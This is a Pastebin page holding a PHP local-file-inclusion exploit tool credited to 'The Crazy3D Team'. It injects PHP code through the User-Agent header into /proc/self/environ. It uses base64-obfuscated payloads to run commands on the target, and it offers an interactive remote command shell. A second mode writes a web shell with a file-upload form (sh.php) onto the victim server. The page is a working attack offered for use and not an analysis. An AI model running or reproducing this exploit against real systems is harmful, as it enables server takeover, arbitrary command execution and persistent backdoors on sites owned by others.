Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // Video tutorial : http://youtu.be/IDSP2768jEQ
- // If you are using BHR put this file in /toos/webapp folder.
- // BHR Download link => www.mediafire.com/?h0c5i3gqzbql345 (For windows only)
- /*
- !LFI_Exploit
- @ HOST = localhost = Target URL
- @ PORT = 80 = Target PORT
- @ PATH = / = Web site path
- @ PAGE = ../../../proc/self/environ%00 = Vulnerable Page
- @ MODE = 1 = Exploiting Mode
- */
- error_reporting(0);
- ini_set("default_socket_timeout", 20);
- function http_send($host, $port, $path, $page, $cmd)
- {
- if (!($sock = fsockopen($host, $port)))
- die("\n[-] No response from {$host}:{$port}\n");
- $packet = "GET {$path}{$page} HTTP/1.0\r\n";
- $packet .= "Host: {$host}\r\n";
- $packet .= "User-Agent: Mozilla/5.0 UPBHR ".$cmd." UPBHR\r\n";
- $packet .= "Connection: Close\r\n\r\n";
- fputs($sock, $packet);
- $data = stream_get_contents($sock);
- if(!preg_match("#UPBHR#",$data))
- {
- die("[-] Cannot exploit the target.\n");
- }
- $resp = explode("UPBHR",$data);
- return $resp[1];
- }
- print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
- print "\n| LFI Exploit Tool for BHR |";
- print "\n| by The UnKn0wN |";
- print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
- print "\n+---------------------------------------------------------------------+";
- print "\n| Mode 1: reverse shell connexion |";
- print "\n| Mode 2: spawn an upload form |";
- print "\n+---------------------------------------------------------------------+";
- print "\n| www.RPG-Exploit.com |";
- print "\n+---------------------------------------------------------------------+\n";
- $host = $argv[1];
- $port = $argv[2];
- $path = $argv[3];
- $page = $argv[4];
- $mode = $argv[5];
- $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaG9zdG5hbWUnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7";
- print "\n[+] Hostname : " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
- print "\n[+] ServerIP : " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SERVER_ADDR']; ?>");
- $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaWQnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7";
- print "\n[+] UserID : " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
- print "\n[+] PHP Version : " .http_send($host,$port, $path, $page,"<?php echo phpversion(); ?>");
- print "\n[+] Script PATH : " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SCRIPT_FILENAME']; ?>")."\n";
- switch ($mode)
- {
- case 2:
- $tcmd="JGg9Zm9wZW4oJ3NoLnBocCcsICd3Jyk7ZndyaXRlKCRoLCc8P3BocCBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9hWE56WlhRb0pGOVFUMU5VV3lKMWNHeHZZV1FpWFNrcGV5UmpiMjUwWlc1MFgyUnBjaUE5SUNJdUx5STdKSFJ0Y0Y5bWFXeGxJRDBnSkY5R1NVeEZVMXNpWm1samFHbGxjaUpkV3lKMGJYQmZibUZ0WlNKZE8ybG1LQ0ZwYzE5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwYlhCZlptbHNaU2twZTJWNGFYUW9Ja3hsSUdacFkyaHBaWElnWlhOMElHbHVkSEp2ZFhaaFlteGxJaWs3ZlNSMGVYQmxYMlpwYkdVZ1BTQWtYMFpKVEVWVFd5Sm1hV05vYVdWeUlsMWJJblI1Y0dVaVhUc2tibUZ0WlY5bWFXeGxJRDBnSkY5R1NVeEZVMXNpWm1samFHbGxjaUpkV3lKdVlXMWxJbDA3YVdZb0lXMXZkbVZmZFhCc2IyRmtaV1JmWm1sc1pTZ2tkRzF3WDJacGJHVXNKR052Ym5SbGJuUmZaR2x5TGlSdVlXMWxYMlpwYkdVcEtYdGxlR2wwS0NKSmJYQnZjM05wWW14bElHUmxJR052Y0dsbGNpQnNaU0JtYVdOb2FXVnlJR1JoYm5NZ0pHTnZiblJsYm5SZlpHbHlJaWs3ZlgwZ1B6NDhabTl5YlNCdFpYUm9iMlE5SWxCUFUxUWlJR0ZqZEdsdmJqMGlJeUlnWlc1amRIbHdaVDBpYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNJK1BHbHVjSFYwSUhSNWNHVTlJbVpwYkdVaUlHNWhiV1U5SW1acFkyaHBaWElpSUhOcGVtVTlJak13SWo0OGFXNXdkWFFnZEhsd1pUMGljM1ZpYldsMElpQnVZVzFsUFNKMWNHeHZZV1FpSUhaaGJIVmxQU0pWY0d4dllXUmxjaUkrUEM5bWIzSnRQZz09IikpID8+Jyk7";
- http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
- print "[+] done. Check {$host}{$path}sh.php\n";
- break;
- default:
- while(1)
- {
- print "\nBHR@{$host}# ";
- if (($cmd = trim(fgets(STDIN))) == "exit") break;
- $cmd = base64_encode('error_reporting(0); $fp = popen(\''.$cmd.'\',\'r\'); while(!feof($fp)) { $result .= fread($fp,1024); };pclose($fp); print $result;');
- print "\n\n ".http_send($host,$port, $path, $page,"<?php eval(base64_decode('".$cmd."')); ?>");
- }
- break;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement